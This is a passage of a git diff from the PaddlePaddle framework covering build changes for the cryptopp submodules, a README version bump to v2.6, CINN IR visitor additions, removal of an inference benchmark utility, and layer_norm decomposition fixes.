diff --git a/.gitmodules b/.gitmodules index 8b06f4fb771cbb..0c41450793fc2a 100644 --- a/.gitmodules +++ b/.gitmodules @@ -110,3 +110,11 @@ path = third_party/cccl url = https://github.com/NVIDIA/cccl.git ignore = dirty +[submodule "third_party/cryptopp"] + path = third_party/cryptopp + url = https://github.com/weidai11/cryptopp.git + ignore = dirty +[submodule "third_party/cryptopp-cmake"] + path = third_party/cryptopp-cmake + url = https://github.com/noloader/cryptopp-cmake.git + ignore = dirty diff --git a/README.md b/README.md index 8f708334ed28f1..001352ea45fc4d 100644 --- a/README.md +++ b/README.md @@ -20,7 +20,7 @@ PaddlePaddle is originated from industrial practices with dedication and commitm ## Installation -### Latest PaddlePaddle Release: [v2.5](https://github.com/PaddlePaddle/Paddle/tree/release/2.5) +### Latest PaddlePaddle Release: [v2.6](https://github.com/PaddlePaddle/Paddle/tree/release/2.6) Our vision is to enable deep learning for everyone via PaddlePaddle. Please refer to our [release announcement](https://github.com/PaddlePaddle/Paddle/releases) to track the latest features of PaddlePaddle. diff --git a/README_cn.md b/README_cn.md index a13fa5ba214503..cd45e4e3ecd2b7 100644 --- a/README_cn.md +++ b/README_cn.md @@ -18,9 +18,9 @@ ## 安装 -### PaddlePaddle最新版本: [v2.5](https://github.com/PaddlePaddle/Paddle/tree/release/2.5) +### PaddlePaddle 最新版本: [v2.6](https://github.com/PaddlePaddle/Paddle/tree/release/2.6) -跟进PaddlePaddle最新特性请参考我们的[版本说明](https://github.com/PaddlePaddle/Paddle/releases) +跟进 PaddlePaddle 最新特性请参考我们的[版本说明](https://github.com/PaddlePaddle/Paddle/releases) ### 安装最新稳定版本: ``` diff --git a/README_ja.md b/README_ja.md index 22c78a1a79bbd9..dad60eb7ffcf87 100644 --- a/README_ja.md +++ b/README_ja.md @@ -20,7 +20,7 @@ PaddlePaddle は、工業化に対するコミットメントを持つ工業的 ## インストール -### PaddlePaddle の最新リリース: [v2.5](https://github.com/PaddlePaddle/Paddle/tree/release/2.5) +### PaddlePaddle の最新リリース: [v2.6](https://github.com/PaddlePaddle/Paddle/tree/release/2.6) 私たちのビジョンは、PaddlePaddle を通じて、誰もが深層学習を行えるようにすることです。 PaddlePaddle の最新機能を追跡するために、私たちの[リリースのお知らせ](https://github.com/PaddlePaddle/Paddle/releases)を参照してください。 diff --git a/cmake/external/cryptopp.cmake b/cmake/external/cryptopp.cmake index 9daa4be7468e42..b3ec8f622923fd 100644 --- a/cmake/external/cryptopp.cmake +++ b/cmake/external/cryptopp.cmake @@ -14,12 +14,13 @@ include(ExternalProject) +set(CRYPTOPP_SOURCE_DIR ${PADDLE_SOURCE_DIR}/third_party/cryptopp) +set(CRYPTOPP_CMAKE_SOURCE_DIR ${PADDLE_SOURCE_DIR}/third_party/cryptopp-cmake) set(CRYPTOPP_PREFIX_DIR ${THIRD_PARTY_PATH}/cryptopp) set(CRYPTOPP_INSTALL_DIR ${THIRD_PARTY_PATH}/install/cryptopp) set(CRYPTOPP_INCLUDE_DIR "${CRYPTOPP_INSTALL_DIR}/include" CACHE PATH "cryptopp include directory." 
FORCE) -set(CRYPTOPP_REPOSITORY ${GIT_URL}/weidai11/cryptopp.git) set(CRYPTOPP_TAG CRYPTOPP_8_2_0) if(WIN32) @@ -63,17 +64,16 @@ include_directories(${CRYPTOPP_INCLUDE_DIR}) ExternalProject_Add( extern_cryptopp ${EXTERNAL_PROJECT_LOG_ARGS} ${SHALLOW_CLONE} - GIT_REPOSITORY ${CRYPTOPP_REPOSITORY} - GIT_TAG ${CRYPTOPP_TAG} PREFIX ${CRYPTOPP_PREFIX_DIR} + SOURCE_DIR ${CRYPTOPP_SOURCE_DIR} UPDATE_COMMAND "" PATCH_COMMAND - COMMAND ${CMAKE_COMMAND} -E remove_directory "/cmake/" - COMMAND git clone ${GIT_URL}/noloader/cryptopp-cmake "/cmake" - COMMAND cd "/cmake" && git checkout tags/${CRYPTOPP_TAG} -b - ${CRYPTOPP_TAG} - COMMAND ${CMAKE_COMMAND} -E copy_directory "/cmake/" - "/" + COMMAND ${CMAKE_COMMAND} -E copy "${CRYPTOPP_CMAKE_SOURCE_DIR}/CMakeLists.txt" + "/CMakeLists.txt" + COMMAND + ${CMAKE_COMMAND} -E copy + "${CRYPTOPP_CMAKE_SOURCE_DIR}/cryptopp-config.cmake" + "/cryptopp-config.cmake" COMMAND ${CRYPTOPP_PATCH_COMMAND} INSTALL_DIR ${CRYPTOPP_INSTALL_DIR} CMAKE_ARGS ${CRYPTOPP_CMAKE_ARGS} diff --git a/cmake/generic.cmake b/cmake/generic.cmake index 788237cc4699b4..e506f2e3714da5 100644 --- a/cmake/generic.cmake +++ b/cmake/generic.cmake @@ -882,12 +882,6 @@ function(hip_library TARGET_NAME) cmake_parse_arguments(hip_library "${options}" "${oneValueArgs}" "${multiValueArgs}" ${ARGN}) if(hip_library_SRCS) - # FindHIP.cmake defined hip_add_library, HIP_SOURCE_PROPERTY_FORMAT is requried if no .cu files found - if(NOT (${CMAKE_CURRENT_SOURCE_DIR} MATCHES ".*/operators" - OR ${CMAKE_CURRENT_SOURCE_DIR} MATCHES ".*/phi/kernels")) - set_source_files_properties(${hip_library_SRCS} - PROPERTIES HIP_SOURCE_PROPERTY_FORMAT 1) - endif() if(hip_library_SHARED OR hip_library_shared) # build *.so hip_add_library(${TARGET_NAME} SHARED ${hip_library_SRCS}) else() @@ -901,6 +895,10 @@ function(hip_library TARGET_NAME) endif() # cpplint code style foreach(source_file ${hip_library_SRCS}) + if(NOT ${source_file} MATCHES "\\.cu$") + set_source_files_properties(${source_file} + PROPERTIES HIP_SOURCE_PROPERTY_FORMAT 1) + endif() string(REGEX REPLACE "\\.[^.]*$" "" source ${source_file}) if(EXISTS ${CMAKE_CURRENT_SOURCE_DIR}/${source}.h) list(APPEND hip_library_HEADERS diff --git a/cmake/inference_lib.cmake b/cmake/inference_lib.cmake index 06dc5d6173794a..517ac24cccc72e 100755 --- a/cmake/inference_lib.cmake +++ b/cmake/inference_lib.cmake @@ -237,6 +237,16 @@ copy_part_of_thrid_party(inference_lib_dist ${PADDLE_INFERENCE_INSTALL_DIR}) set(src_dir "${PADDLE_SOURCE_DIR}/paddle/fluid") +if(WIN32) + set(paddle_common_lib ${PADDLE_BINARY_DIR}/paddle/common/common.*) +else() + set(paddle_common_lib ${PADDLE_BINARY_DIR}/paddle/common/libcommon.*) +endif() +copy( + inference_lib_dist + SRCS ${paddle_common_lib} + DSTS ${PADDLE_INFERENCE_INSTALL_DIR}/paddle/lib) + if(WIN32) if(WITH_STATIC_LIB) set(paddle_inference_lib @@ -268,11 +278,6 @@ else() SRCS ${paddle_phi_lib} DSTS ${PADDLE_INFERENCE_INSTALL_DIR}/paddle/lib) endif() - set(paddle_common_lib ${PADDLE_BINARY_DIR}/paddle/common/libcommon.*) - copy( - inference_lib_dist - SRCS ${paddle_common_lib} - DSTS ${PADDLE_INFERENCE_INSTALL_DIR}/paddle/lib) endif() copy( diff --git a/paddle/cinn/ir/ir_base.h b/paddle/cinn/ir/ir_base.h index c333448d029ae0..0047100ebcfdfc 100644 --- a/paddle/cinn/ir/ir_base.h +++ b/paddle/cinn/ir/ir_base.h @@ -110,16 +110,23 @@ class Dim; macro__(Product) \ macro__(Sum) \ macro__(PrimitiveNode) \ - macro__(IntrinsicOp) \ macro__(_BufferRange_) \ macro__(ScheduleBlock) \ macro__(ScheduleBlockRealize) \ macro__(_Dim_) \ +#define 
NODETY_CONTROL_OP_FOR_INTRINSIC(macro__) \ + macro__(IntrinsicOp) \ #define NODETY_FORALL(__m) \ NODETY_PRIMITIVE_TYPE_FOR_EACH(__m) \ NODETY_OP_FOR_EACH(__m) \ + NODETY_CONTROL_OP_FOR_INTRINSIC(__m) \ + NODETY_CONTROL_OP_FOR_EACH(__m) + +#define NODETY_FORALL_EXCEPT_INTRINSIC(__m) \ + NODETY_PRIMITIVE_TYPE_FOR_EACH(__m) \ + NODETY_OP_FOR_EACH(__m) \ NODETY_CONTROL_OP_FOR_EACH(__m) // clang-format on diff --git a/paddle/cinn/ir/utils/ir_nodes_collector.cc b/paddle/cinn/ir/utils/ir_nodes_collector.cc index ac2f0317e9213f..e4ebaca653bae9 100644 --- a/paddle/cinn/ir/utils/ir_nodes_collector.cc +++ b/paddle/cinn/ir/utils/ir_nodes_collector.cc @@ -15,6 +15,8 @@ #include "paddle/cinn/ir/utils/ir_nodes_collector.h" #include +#include "paddle/cinn/ir/intrinsic_ops.h" +#include "paddle/cinn/ir/ir.h" #include "paddle/cinn/ir/ir_mutator.h" #include "paddle/cinn/ir/ir_printer.h" @@ -71,8 +73,71 @@ struct IrNodesCollector : public IRVisitorRequireReImpl { } \ } - NODETY_FORALL(__m) + NODETY_FORALL_EXCEPT_INTRINSIC(__m) #undef __m + + void Visit(const ir::IntrinsicOp* op) { + switch (op->getKind()) { +#define __(x) \ + case ir::IntrinsicKind::k##x: \ + Visit(llvm::dyn_cast(op)); \ + break; + + INTRINSIC_KIND_FOR_EACH(__) +#undef __ + } + } + + void Visit(const ir::intrinsics::GetAddr* x) { + if (x->data.defined()) { + Visit(&(x->data)); + } + } + + void Visit(const ir::intrinsics::BufferGetDataHandle* x) { + if (x->buffer.defined()) { + Visit(&(x->buffer)); + } + } + + void Visit(const ir::intrinsics::BufferGetDataConstHandle* x) { + if (x->buffer.defined()) { + Visit(&(x->buffer)); + } + } + + void Visit(const ir::intrinsics::PodValueToX* x) { + if (x->pod_value_ptr.defined()) { + Visit(&(x->pod_value_ptr)); + } + } + + void Visit(const ir::intrinsics::BufferCreate* x) { + if (x->buffer.defined()) { + Visit(&(x->buffer)); + } + } + + void Visit(const ir::intrinsics::ArgsConstruct* x) { + if (x->var.defined()) { + Expr convert = Expr(x->var); + Visit(&convert); + } + for (int i = 0; i < x->args.size(); ++i) { + if (x->args[i].defined()) { + Visit(&(x->args[i])); + } + } + } + + void Visit(const ir::intrinsics::BuiltinIntrin* x) { + for (int i = 0; i < x->args.size(); ++i) { + if (x->args[i].defined()) { + Visit(&(x->args[i])); + } + } + } + std::set visited_; }; diff --git a/paddle/fluid/distributed/common/chunk_allocator.h b/paddle/fluid/distributed/common/chunk_allocator.h index 17f7bb14224d35..7b19b3a1098398 100644 --- a/paddle/fluid/distributed/common/chunk_allocator.h +++ b/paddle/fluid/distributed/common/chunk_allocator.h @@ -14,6 +14,7 @@ #pragma once #include +#include "paddle/fluid/platform/enforce.h" namespace paddle { namespace distributed { @@ -77,9 +78,16 @@ class ChunkAllocator { void create_new_chunk() { Chunk* chunk; - posix_memalign(reinterpret_cast(&chunk), - std::max(sizeof(void*), alignof(Chunk)), - sizeof(Chunk) + sizeof(Node) * _chunk_size); + size_t alloc_size = sizeof(Chunk) + sizeof(Node) * _chunk_size; + int error = posix_memalign(reinterpret_cast(&chunk), + std::max(sizeof(void*), alignof(Chunk)), + alloc_size); + PADDLE_ENFORCE_EQ(error, + 0, + paddle::platform::errors::ResourceExhausted( + "Fail to alloc memory of %ld size, error code is %d.", + alloc_size, + error)); chunk->next = _chunks; _chunks = chunk; diff --git a/paddle/fluid/eager/api/manual/eager_manual/forwards/multiply_fwd_func.cc b/paddle/fluid/eager/api/manual/eager_manual/forwards/multiply_fwd_func.cc index 2bd9213cae610d..47509d025722d8 100644 --- 
a/paddle/fluid/eager/api/manual/eager_manual/forwards/multiply_fwd_func.cc +++ b/paddle/fluid/eager/api/manual/eager_manual/forwards/multiply_fwd_func.cc @@ -61,8 +61,9 @@ paddle::Tensor multiply_ad_func(const paddle::Tensor& x, // Type promotion Logic if (phi::NeedTypePromotion(x.dtype(), y.dtype())) { VLOG(5) << "got different data type, run type protmotion automatically."; - LOG(WARNING) << "got different data type, run type protmotion " - "automatically, this may cause data type been changed."; + LOG_FIRST_N(WARNING, 1) + << "got different data type, run type protmotion " + "automatically, this may cause data type been changed."; auto op_name = phi::TransToFluidOpName("multiply"); auto promotion_type = phi::GetPromoteDtype(op_name, x.dtype(), y.dtype()); @@ -407,8 +408,9 @@ paddle::Tensor multiply_ad_func(const paddle::Tensor& x, // Type promotion Logic if (phi::NeedTypePromotion(x.dtype(), y.dtype())) { VLOG(5) << "got different data type, run type protmotion automatically."; - LOG(WARNING) << "got different data type, run type protmotion " - "automatically, this may cause data type been changed."; + LOG_FIRST_N(WARNING, 1) + << "got different data type, run type protmotion " + "automatically, this may cause data type been changed."; auto op_name = phi::TransToFluidOpName("multiply"); auto promotion_type = phi::GetPromoteDtype(op_name, x.dtype(), y.dtype()); diff --git a/paddle/fluid/eager/auto_code_generator/generator/eager_gen.py b/paddle/fluid/eager/auto_code_generator/generator/eager_gen.py index 2a96fddccbce70..75d6cb94c6b5f2 100644 --- a/paddle/fluid/eager/auto_code_generator/generator/eager_gen.py +++ b/paddle/fluid/eager/auto_code_generator/generator/eager_gen.py @@ -528,7 +528,7 @@ class {} : public egr::GradNodeBase {{ TYPE_PROMOTION_LOGIC_TEMPLATE = """ if (phi::NeedTypePromotion({x}.dtype(), {y}.dtype())) {{ VLOG(5) << "got different data type, run type protmotion automatically."; - LOG(WARNING) << "got different data type, run type protmotion automatically, this may cause data type been changed."; + LOG_FIRST_N(WARNING, 1) << "got different data type, run type protmotion automatically, this may cause data type been changed."; {op_name} auto promotion_type = phi::GetPromoteDtype(op_name, {x}.dtype(), {y}.dtype()); diff --git a/paddle/fluid/inference/CMakeLists.txt b/paddle/fluid/inference/CMakeLists.txt index 3f4e7a9344a30c..d2f834a5938e96 100644 --- a/paddle/fluid/inference/CMakeLists.txt +++ b/paddle/fluid/inference/CMakeLists.txt @@ -35,7 +35,7 @@ get_property(fluid_modules GLOBAL PROPERTY FLUID_MODULES) get_property(phi_modules GLOBAL PROPERTY PHI_MODULES) get_property(ir_targets GLOBAL PROPERTY IR_TARGETS) get_property(not_infer_modules GLOBAL PROPERTY NOT_INFER_MODULES) -set(utils_modules pretty_log string_helper benchmark utf8proc) +set(utils_modules pretty_log string_helper utf8proc) if(NOT WITH_GFLAGS) set(utils_modules ${utils_modules} paddle_flags) diff --git a/paddle/fluid/inference/api/analysis_config.cc b/paddle/fluid/inference/api/analysis_config.cc index d9d7d5aa3659ad..9cec6ac6878dc2 100644 --- a/paddle/fluid/inference/api/analysis_config.cc +++ b/paddle/fluid/inference/api/analysis_config.cc @@ -180,6 +180,11 @@ void AnalysisConfig::EnableXpu(int l3_size, bool transformer_encoder_adaptive_seqlen, bool enable_multi_stream) { #if defined(PADDLE_WITH_XPU) || defined(LITE_SUBGRAPH_WITH_XPU) + LOG_FIRST_N(WARNING, 1) + << "Parameters in EnableXpu/enable_xpu is deprecated since version " + "2.6.1, and will be removed in version 3.0! 
Please use " + "EnableXpu/enable_xpu without parameters, and use " + "SetXpuConfig/set_xpu_config to set options."; use_xpu_ = true; xpu_config_.l3_size = l3_size; xpu_config_.conv_autotune_level = conv_autotune; diff --git a/paddle/fluid/inference/api/paddle_analysis_config.h b/paddle/fluid/inference/api/paddle_analysis_config.h index 6a3e943dec7e9a..b5a26ff9225aa4 100644 --- a/paddle/fluid/inference/api/paddle_analysis_config.h +++ b/paddle/fluid/inference/api/paddle_analysis_config.h @@ -111,6 +111,7 @@ struct PD_INFER_DECL XpuConfig { bool conv_autotune_file_writeback{false}; // Fc autotune level. The Optional values are 0-9. Default 0 means no + // autotune. int fc_autotune_level{0}; // Base fc autotune info is read from fc_autotune_file. std::string fc_autotune_file; @@ -367,7 +368,7 @@ struct PD_INFER_DECL AnalysisConfig { /// void EnableXpu(int l3_size = 0xfffc00, bool l3_locked = false, - bool conv_autotune = true, + bool conv_autotune = false, const std::string& conv_autotune_file = "", const std::string& transformer_encoder_precision = "int16", bool transformer_encoder_adaptive_seqlen = false, diff --git a/paddle/fluid/inference/tensorrt/op_teller.cc b/paddle/fluid/inference/tensorrt/op_teller.cc old mode 100755 new mode 100644 index 8cf589541b1e04..10763eb911543a --- a/paddle/fluid/inference/tensorrt/op_teller.cc +++ b/paddle/fluid/inference/tensorrt/op_teller.cc @@ -47,6 +47,7 @@ struct SimpleOpTypeSetTeller : public Teller { #endif #if IS_TRT_VERSION_GE(7000) teller_set.insert("tile"); + int8_teller_set.insert("tile"); teller_set.insert("flatten_contiguous_range"); int8_teller_set.insert("flatten_contiguous_range"); teller_set.insert("rnn"); @@ -2302,15 +2303,20 @@ struct SimpleOpTypeSetTeller : public Teller { if (!with_dynamic_shape) { if (tile_inputs.find("repeat_times_tensor") != tile_inputs.end()) { if (!desc.Input("repeat_times_tensor").empty()) { + VLOG(3) << "Tile op: repeat_times_tensor is not empty."; return false; } } if (tile_inputs.find("RepeatTimes") != tile_inputs.end()) { if (!desc.Input("RepeatTimes").empty()) { + VLOG(3) << "Tile op: RepeatTimes is not empty."; return false; } } - if (!desc.HasAttr("repeat_times")) return false; + if (!desc.HasAttr("repeat_times")) { + VLOG(3) << "Tile op:`repeat_times` is not set."; + return false; + } } } #endif diff --git a/paddle/fluid/inference/utils/CMakeLists.txt b/paddle/fluid/inference/utils/CMakeLists.txt index 3dbc06bfc11b7e..0ad2cb0e3f0c84 100644 --- a/paddle/fluid/inference/utils/CMakeLists.txt +++ b/paddle/fluid/inference/utils/CMakeLists.txt @@ -1,8 +1,3 @@ -cc_library( - benchmark - SRCS benchmark.cc - DEPS enforce common) -paddle_test(test_benchmark SRCS benchmark_tester.cc DEPS benchmark) cc_library( infer_io_utils SRCS io_utils.cc @@ -13,13 +8,5 @@ cc_library( DEPS proto_desc enforce common) cc_library(table_printer SRCS table_printer.cc) -paddle_test(test_table_printer SRCS table_printer_tester.cc) proto_library(shape_range_info_proto SRCS shape_range_info.proto) - -if(WITH_ONNXRUNTIME AND WIN32) - # Copy onnxruntime for some c++ test in Windows, since the test will - # be build only in CI, so suppose the generator in Windows is Ninja. - copy_onnx(test_benchmark) - copy_onnx(test_table_printer) -endif() diff --git a/paddle/fluid/inference/utils/benchmark.cc b/paddle/fluid/inference/utils/benchmark.cc deleted file mode 100644 index 24bc99ed183fad..00000000000000 --- a/paddle/fluid/inference/utils/benchmark.cc +++ /dev/null @@ -1,54 +0,0 @@ -// Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. 
-// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. - -#include "paddle/fluid/inference/utils/benchmark.h" - -#include - -#include "paddle/fluid/platform/enforce.h" - -namespace paddle { -namespace inference { - -std::string Benchmark::SerializeToString() const { - std::stringstream ss; - ss << "-----------------------------------------------------\n"; - ss << "name\t"; - ss << "batch_size\t"; - ss << "num_threads\t"; - ss << "latency\t"; - ss << "qps"; - ss << '\n'; - - ss << name_ << "\t"; - ss << batch_size_ << "\t\t"; - ss << num_threads_ << "\t"; - ss << latency_ << "\t"; - ss << 1000.0 / latency_; - ss << '\n'; - return ss.str(); -} -void Benchmark::PersistToFile(const std::string &path) const { - std::ofstream file(path, std::ios::app); - PADDLE_ENFORCE_EQ( - file.is_open(), - true, - platform::errors::Unavailable("Can not open %s to add benchmark.", path)); - file << SerializeToString(); - file.flush(); - file.close(); -} - -} // namespace inference -} // namespace paddle diff --git a/paddle/fluid/inference/utils/benchmark.h b/paddle/fluid/inference/utils/benchmark.h deleted file mode 100644 index 56789843c3728e..00000000000000 --- a/paddle/fluid/inference/utils/benchmark.h +++ /dev/null @@ -1,56 +0,0 @@ -// Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. - -#pragma once -#include -#include -#include - -#include "paddle/utils/test_macros.h" - -namespace paddle { -namespace inference { - -/* - * Helper class to calculate the performance. 
- */ -struct TEST_API Benchmark { - int batch_size() const { return batch_size_; } - void SetBatchSize(int x) { batch_size_ = x; } - - int num_threads() const { return num_threads_; } - void SetNumThreads(int x) { num_threads_ = x; } - - bool use_gpu() const { return use_gpu_; } - void SetUseGpu() { use_gpu_ = true; } - - float latency() const { return latency_; } - void SetLatency(float x) { latency_ = x; } - - const std::string& name() const { return name_; } - void SetName(const std::string& name) { name_ = name; } - - std::string SerializeToString() const; - void PersistToFile(const std::string& path) const; - - private: - bool use_gpu_{false}; - int batch_size_{0}; - float latency_; - int num_threads_{1}; - std::string name_; -}; - -} // namespace inference -} // namespace paddle diff --git a/paddle/fluid/inference/utils/benchmark_tester.cc b/paddle/fluid/inference/utils/benchmark_tester.cc deleted file mode 100644 index 8f7614cb10a44e..00000000000000 --- a/paddle/fluid/inference/utils/benchmark_tester.cc +++ /dev/null @@ -1,40 +0,0 @@ -// Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. - -#include -#include - -#include "paddle/fluid/inference/utils/benchmark.h" - -using namespace paddle::inference; // NOLINT -TEST(Benchmark, basic) { - Benchmark benchmark; - benchmark.SetName("key0"); - benchmark.SetBatchSize(10); - benchmark.SetUseGpu(); - benchmark.SetLatency(220); - LOG(INFO) << "benchmark:\n" << benchmark.SerializeToString(); -} - -TEST(Benchmark, PersistToFile) { - Benchmark benchmark; - benchmark.SetName("key0"); - benchmark.SetBatchSize(10); - benchmark.SetUseGpu(); - benchmark.SetLatency(220); - - benchmark.PersistToFile("1.log"); - benchmark.PersistToFile("2.log"); - benchmark.PersistToFile("3.log"); -} diff --git a/paddle/fluid/inference/utils/table_printer_tester.cc b/paddle/fluid/inference/utils/table_printer_tester.cc deleted file mode 100644 index fc482807b2854c..00000000000000 --- a/paddle/fluid/inference/utils/table_printer_tester.cc +++ /dev/null @@ -1,82 +0,0 @@ -// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. 
- -#include -#include - -#include "paddle/fluid/inference/utils/table_printer.h" - -namespace paddle { -namespace inference {} // namespace inference -} // namespace paddle - -TEST(table_printer, output) { - std::vector header{"config", "value"}; - paddle::inference::TablePrinter table(header); - - // model_dir - table.InsertRow({"model_dir", "./model_dir"}); - // model - table.InsertRow({"model_file", "./model.pdmodel"}); - table.InsertRow({"params_file", "./model.pdiparams"}); - - table.InsetDivider(); - // gpu - table.InsertRow({"use_gpu", "true"}); - table.InsertRow({"gpu_device_id", "0"}); - table.InsertRow({"memory_pool_init_size", "100MB"}); - table.InsertRow({"thread_local_stream", "false"}); - table.InsetDivider(); - - // trt precision - table.InsertRow({"use_trt", "true"}); - table.InsertRow({"trt_precision", "fp32"}); - table.InsertRow({"enable_dynamic_shape", "true"}); - table.InsertRow({"DisableTensorRtOPs", "{}"}); - table.InsertRow({"EnableVarseqlen", "ON"}); - table.InsertRow({"tensorrt_dla_enabled", "ON"}); - table.InsetDivider(); - - // lite - table.InsertRow({"use_lite", "ON"}); - table.InsetDivider(); - - // xpu - table.InsertRow({"use_xpu", "true"}); - table.InsertRow({"xpu_device_id", "0"}); - table.InsetDivider(); - - // ir - table.InsertRow({"ir_optim", "true"}); - table.InsertRow({"ir_debug", "false"}); - table.InsertRow({"enable_memory_optim", "false"}); - table.InsertRow({"EnableProfile", "false"}); - table.InsertRow({"glog_info_disabled", "false"}); - table.InsetDivider(); - - // cpu - table.InsertRow({"CpuMathLibrary", "4"}); - // mkldnn - table.InsertRow({"enable_mkldnn", "false"}); - table.InsertRow({"mkldnn_cache_capacity", "10"}); - - // a long string - table.InsertRow( - {"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ a long string " - "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", - "------------------------------------------ a long value " - "-----------------------------------------------------"}); - - LOG(INFO) << table.PrintTable(); -} diff --git a/paddle/fluid/operators/set_value_op.cc b/paddle/fluid/operators/set_value_op.cc index 16864b80b5c765..a0aa1f589191ff 100644 --- a/paddle/fluid/operators/set_value_op.cc +++ b/paddle/fluid/operators/set_value_op.cc @@ -151,32 +151,26 @@ class SetValueGradMaker : public framework::SingleGradOpMaker { protected: void Apply(GradOpPtr op) const override { - if (this->HasInput("ValueTensor")) { - op->SetType("set_value_grad"); - - op->SetInput(framework::GradVarName("Out"), this->OutputGrad("Out")); - op->SetInput("ValueTensor", this->Input("ValueTensor")); - if (this->HasInput("StartsTensorList")) { - op->SetInput("StartsTensorList", this->Input("StartsTensorList")); - } - if (this->HasInput("EndsTensorList")) { - op->SetInput("EndsTensorList", this->Input("EndsTensorList")); - } - if (this->HasInput("StepsTensorList")) { - op->SetInput("StepsTensorList", this->Input("StepsTensorList")); - } - - op->SetAttrMap(this->Attrs()); - - op->SetOutput(framework::GradVarName("ValueTensor"), - this->InputGrad("ValueTensor")); - op->SetOutput(framework::GradVarName("Input"), this->InputGrad("Input")); - - } else { - op->SetType("assign"); - op->SetInput("X", this->OutputGrad("Out")); - op->SetOutput("Out", this->InputGrad("Input")); + op->SetType("set_value_grad"); + op->SetInput("ValueTensor", this->Input("ValueTensor")); + op->SetOutput(framework::GradVarName("ValueTensor"), + this->InputGrad("ValueTensor")); + + op->SetInput(framework::GradVarName("Out"), this->OutputGrad("Out")); + + if (this->HasInput("StartsTensorList")) { + 
op->SetInput("StartsTensorList", this->Input("StartsTensorList")); + } + if (this->HasInput("EndsTensorList")) { + op->SetInput("EndsTensorList", this->Input("EndsTensorList")); } + if (this->HasInput("StepsTensorList")) { + op->SetInput("StepsTensorList", this->Input("StepsTensorList")); + } + + op->SetAttrMap(this->Attrs()); + + op->SetOutput(framework::GradVarName("Input"), this->InputGrad("Input")); } }; diff --git a/paddle/fluid/primitive/composite/composite.h b/paddle/fluid/primitive/composite/composite.h index a35095c98d4a29..66f17168ec01a5 100644 --- a/paddle/fluid/primitive/composite/composite.h +++ b/paddle/fluid/primitive/composite/composite.h @@ -22,6 +22,9 @@ namespace paddle { namespace primitive { namespace details { +// empty_shape means x.shape=[] +static std::vector empty_shape; + template Tensor mean_decomp(const Tensor& x, const IntArray& axis, bool keepdim) { auto org_dtype = x.dtype(); @@ -345,62 +348,66 @@ std::tuple layer_norm_decomp( // cast dtype to float32 if dtype =float16 or bfloat16 if (need_cast) { - x_cast = cast(x_cast, phi::DataType::FLOAT32); + x_cast = cast(x_cast, DataType::FLOAT32); } auto x_dim = common::vectorize(x.dims()); for (size_t i = begin_norm_axis; i < x_dim.size(); i++) { axis.push_back(static_cast(i)); } - auto mean_ = mean_decomp(x_cast, IntArray(axis), true); + auto mean_ = mean_decomp(x_cast, axis, true); auto difference = x_cast - mean_; auto var_tmp1 = difference * difference; - auto variance = mean_decomp(var_tmp1, IntArray(axis), true); + auto variance = mean_decomp(var_tmp1, axis, true); auto var_tmp3 = variance + epsilon; auto rsqrt_var = elementwise_pow( - var_tmp3, - full(common::vectorize(var_tmp3.dims()), -0.5, var_tmp3.dtype())); + var_tmp3, full(empty_shape, -0.5, var_tmp3.dtype())); auto out = difference * rsqrt_var; auto scale_ptr = scale.get_ptr(); auto bias_ptr = bias.get_ptr(); - std::vector slice_shape; - for (int64_t i = begin_norm_axis; i < static_cast(x_dim.size()); - i++) { - slice_shape.push_back(x_dim[i]); + std::vector slice_shape_l; + std::vector slice_shape_r; + for (int64_t i = 0; i < static_cast(x_dim.size()); i++) { + if (i < begin_norm_axis) { + slice_shape_l.push_back(x_dim[i]); + } else { + slice_shape_r.push_back(x_dim[i]); + } } Tensor scale_cast; if (scale_ptr) { - if (slice_shape != scale_ptr->shape()) { - scale_cast = reshape(*scale_ptr, slice_shape); + if (slice_shape_r != scale_ptr->shape()) { + scale_cast = reshape(*scale_ptr, slice_shape_r); } else { scale_cast = *scale_ptr; } if (need_cast) { - scale_cast = cast(scale_cast, phi::DataType::FLOAT32); + scale_cast = cast(scale_cast, DataType::FLOAT32); } out = out * scale_cast; } Tensor bias_cast; if (bias_ptr) { - if (slice_shape != bias_ptr->shape()) { - bias_cast = reshape(*bias_ptr, slice_shape); + if (slice_shape_r != bias_ptr->shape()) { + bias_cast = reshape(*bias_ptr, slice_shape_r); } else { bias_cast = *bias_ptr; } if (need_cast) { - bias_cast = cast(bias_cast, phi::DataType::FLOAT32); + bias_cast = cast(bias_cast, DataType::FLOAT32); } out = out + bias_cast; } - mean_ = reshape(mean_, std::vector({-1})); - variance = reshape(variance, std::vector({-1})); + mean_ = reshape(mean_, slice_shape_l); + variance = reshape(variance, slice_shape_l); + // same as LayerNormInferMeta + // x: float32 --> out: float32, mean: float32, variance: float32 + // x: float16 --> out: float16, mean: float32, variance: float32 if (need_cast) { out = cast(out, org_dtype); - mean_ = 